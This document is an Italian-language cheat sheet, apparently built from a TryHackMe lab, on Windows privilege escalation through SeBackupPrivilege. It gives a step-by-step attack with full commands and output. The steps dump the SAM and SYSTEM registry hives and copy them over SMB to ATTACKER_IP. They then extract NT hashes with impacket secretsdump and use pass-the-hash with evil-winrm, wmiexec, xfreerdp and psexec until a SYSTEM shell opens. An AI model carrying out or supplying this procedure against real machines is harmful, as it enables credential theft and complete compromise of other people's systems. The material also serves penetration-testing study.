tags: windows priv_esc abuso_privilegi privilage_escalation SeBackupPrivilege
Se sei un utente di una macchina semplice devi catturare i file SAM e SYSTEM per ottenere i privilegi di root, per farlo segui questa procedura:
Questo tipo di scalata di privilegi si effettua ottenendo i privilegi di altri utenti, è possibile vedere i privilegi del proprio utente digitando il comando:
whoami /priv
Puoi trovare dettagli specifici su ogni stato di privilegio a queste due pagine Microsoft Priv2Admin.
Quando si hanno i privilegi SeChangeNotifyPrivilege possiamo utilizzare i seguenti comandi per copiarci i backup degli hash SAM e System:
C:\> reg save hklm\system C:\Users\THMBackup\system.hive
The operation completed successfully.
C:\> reg save hklm\sam C:\Users\THMBackup\sam.hive
The operation completed successfully.Questi file ce li possiamo trasferire nella nostra macchina attaccante tramite per esempio il software di impacket smbserver.py nel seguente modo:
Dalla macchina attaccante eseguiamo questi comandi:
# è importantissimo creare questa cartella altrimenti il comando seguente non funzionerà:
mkdir share
python3 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
Dalla macchina vittima digitiamo i seguenti comandi:
#Prima dobbiamo autenticarci:
net use \\192.168.165.50\public /user:THMBackup CopyMaster555
#Poi possiamo trasferire i file:
C:\> copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
C:\> copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\
Una volta trasferito nella nostra macchina possiamo utilizzare il software sercretdump.py sempre di impacket per estrarre gli hash e infine utilizzare sempre un software di impacket chiamato psexec.py per ottenere i privilegi di root, come mostrato di seguito:
user@attackerpc$ python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Connessione Tramite Hash
Evil-Winrm
Se la porta 5985 (WinRM) è aperta, questo è lo strumento migliore in assoluto. Non carica file strani, usa protocolli nativi di amministrazione Windows e ti dà una shell PowerShell stabile e colorata.
evil-winrm -i 10.129.4.113 -u Administrator -H <Solo_Hash_NT>nota
Fai attenzione all’hash, questo strumento vuole solo la seconda parte dell’hash, per esempio di questo hash aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d vuole solo ee4457ae59f1e3fbd764e33d9cef123d
WMIexec (Il Ninja)
Fa parte della suite Impacket (come psexec), ma lavora in modo diverso. Invece di caricare un .exe, usa WMI (Windows Management Instrumentation) per eseguire comandi.
impacket-wmiexec -hashes <LM:NT> [email protected]XFreeRDP (L’Interfaccia Grafica)
Vuoi vedere il desktop come se fossi seduto davanti al PC? Puoi fare Pass-The-Hash anche con il Desktop Remoto (RDP), grazie a una funzione chiamata “Restricted Admin Mode”.
xfreerdp /v:10.129.4.113 /u:Administrator /pth:<Solo_Hash_NT> /cert:ignoreAnche lui vuole solo l’hash NT senza quello LM come Evil-Winrm.
PsExec
psexec è il “nonno” di tutti i tool, ma ha un grosso difetto: è rumoroso. Per funzionare, deve caricare un file .exe sul disco della vittima e creare un servizio. Windows Defender lo blocca quasi sempre oggi.
user@attackerpc$ python3 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 [email protected]
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.175.90.....
[*] Found writable share ADMIN$
[*] Uploading file nfhtabqO.exe
[*] Opening SVCManager on 10.10.175.90.....
[*] Creating service RoLE on 10.10.175.90.....
[*] Starting service RoLE.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system